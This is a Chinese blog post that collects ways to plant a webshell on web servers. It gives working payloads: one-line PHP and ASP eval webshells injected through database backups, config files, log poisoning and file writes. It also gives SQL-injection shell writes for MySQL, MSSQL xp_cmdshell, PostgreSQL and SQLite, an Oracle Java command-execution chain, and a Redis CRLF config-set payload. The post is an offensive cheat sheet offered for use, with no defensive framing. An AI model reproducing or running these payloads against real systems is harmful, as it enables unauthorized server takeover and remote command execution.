Getshell思路总结

短命女 2023-01-07 11:24 228阅读 0赞

# getshell的常见方法总结 #

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70]

## 后台getshell ##

1.)上传getshell  
①基础的文件上传类方式进行getshell  
[高级利用][Link 1]  
[upload专题][upload]  
[中间建类总结][Link 2]  
[文件上传绕过总结][Link 3]  
[常见6种waf绕过和防护原理][6_waf]  
[getshell姿势文章总结][getshell]  
②数据库备份getshell

#直接数据库备份getshell
    原理-->1.)上传备份数据库结合自解压拿到shell
    2.)通过直接更改文件名拿到shell
    
    ①上传图片马并获得图片马路径
    ②通过数据库备份修改后缀名(修改为允许的后缀名代getshell)
    #绕方法getshell
    #如果名字不可以修改
    ①将一句话木马插入到数据库中-->比如通过新建管理员用户，将用户名用一句话木马代替（用户名通常有长度限制，在前端修改maxlength即可），<%eval request ("pass")%>
    ②在备份数据库登录访问该界面进行getshell

[数据库备份例子][Link 4]  
③修改图片允许上传的类型

后台设置中添加aasps|asp|php|jsp|aspx|asa|cer，保存后上传aasps文件，上传后为asp文件可以解析Getshll

④网站配置插马getshell

配置文件路径:../inc/config.asp
    插马语句:“%><%eval request(“v01cano”)%><%‘

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 1]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 2]

[思路代][Link 5]  
5.)任意文件读取getshell  
[任意文件读取漏洞的曲折历程][Link 6]

2.)执行sql语句或者数据库拿getshell

3.)命令执行getshell

本地命令执行
    远程命令执行getshell

## 非后台getshell ##

①sql注入

mysql
    select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php'
    
    Sql server
    存储过程xp_cmdshell
    ;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > D:\\WWW\\2333.aspx' ;--
    
    Oracle
    1、创建JAVA包
    select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
    2、JAVA权限
    select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;
    3、创建函数
    select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
    URL执行
    id=602'||utl_inadd.get_host_name((select LinxRUNCMD('cmd /c dir d:/') from dual))-- postgresql COPY (select '<?php phpinfo();?>') to '/tmp/1.php'; sqlite3 ;attach database 'D:\\www\\008.php' as tt;create TABLE tt.exp (dataz text) ; insert INTO tt.exp (dataz) VALUES (x'3c3f70687020406576616c28245f504f53545b27636d64275d293b3f3e');
    
    redis
    %0D%0Aconfig%20set%20dir%20%2Fvar%2Fwww%2Fhtml2F%0D%0Aconfig%20set%20dbfilename%20shell%2Ephp%0D%0Aset%20x%2022%3C%3Fphp%20phpinfo%28%29%3B%%203F%3E%22%0D%0Asave%0D%0A

[sql注入][sql]  
②非常规类

xxe
    SSRF + RCE
    反序列化
    struts2等组合拳方式
    0day拿webshell
    IIS写权限拿webshell(put一个shell进去)
    
    命令执行拿webshell
    1.)直接执行linux命令
    如
    如果有站的命令执行权限,可以利用echo命令写马
    通过注入漏洞拿webshell
    #windows环境下
    echo ^<^?php @eval($_POST[C0cho]);?^>^ >c:\1.php
    #linux环境下
    echo -e "<?php @assert(\$_POST[C0cho])?>" > 1.php
    2.)参数进行
    写马思路-->
    ①利用fputs写马
    url=data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['hack']);?>")?>
    ②日志注入
    利用-->结合文件包含联用
    ?url=/var/log/nginx/access.log
    在user-agent参数中注入
    <?php @eval($_POST['a']);?>
    ③远程注入
    
    
    前台图片上传拿webshell
    
    Strusts2拿webshell
    
    java反序列拿shell

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 3]  
如  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 4]

3.常见的cms拿shell

#几种cms
    1.)dedecms
    2.)南方数据、良精、动易
    3.)ecshop
    4.)wordpress上传插件
    5.)phpmyadmin写shell
    6.)kesion cms
    7.)aspcms
    8.)SD cms
    9.)phpcms
    10.)metinfo
    11.)discuz
    12.)帝国cms
    13.)phpmywind
    14.)phpweb

[14种cms getshell思路总结][14_cms getshell]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70]: /images/20221119/da3b54db171b4851af6fddde95126688.png
[Link 1]: https://choge.top/2020/02/29/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%AB%98%E7%BA%A7%E5%88%A9%E7%94%A8/
[upload]: https://blog.csdn.net/qq_33942040/article/details/109859374
[Link 2]: https://blog.csdn.net/qq_33942040/article/details/112079183
[Link 3]: https://mp.weixin.qq.com/s/FXOLP7q4ZR1vozoPFNIPkg
[6_waf]: https://mp.weixin.qq.com/s/kJ2K9RG7GXYB03Tff2Df7Q
[getshell]: https://mp.weixin.qq.com/s/-c0DrMtjoF-6YtJejeR2Mg
[Link 4]: https://baijiahao.baidu.com/s?id=1640632399086225860&wfr=spider&for=pc
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 1]: https://img-blog.csdnimg.cn/20210117192938872.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 2]: https://img-blog.csdnimg.cn/20210117192947295.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw,size_16,color_FFFFFF,t_70
[Link 5]: https://blog.csdn.net/anlalu233/article/details/105069503/
[Link 6]: https://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247486140&idx=1&sn=65709218fe4b9e4fd42ad22fc1120aff&scene=21#wechat_redirect
[sql]: https://blog.csdn.net/qq_33942040/article/details/109144962
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 3]: https://img-blog.csdnimg.cn/20210117194552600.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 4]: https://img-blog.csdnimg.cn/2021013017452945.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw,size_16,color_FFFFFF,t_70
[14_cms getshell]: https://mp.weixin.qq.com/s/FHT-xHoEVRtnrnXPh6LK-A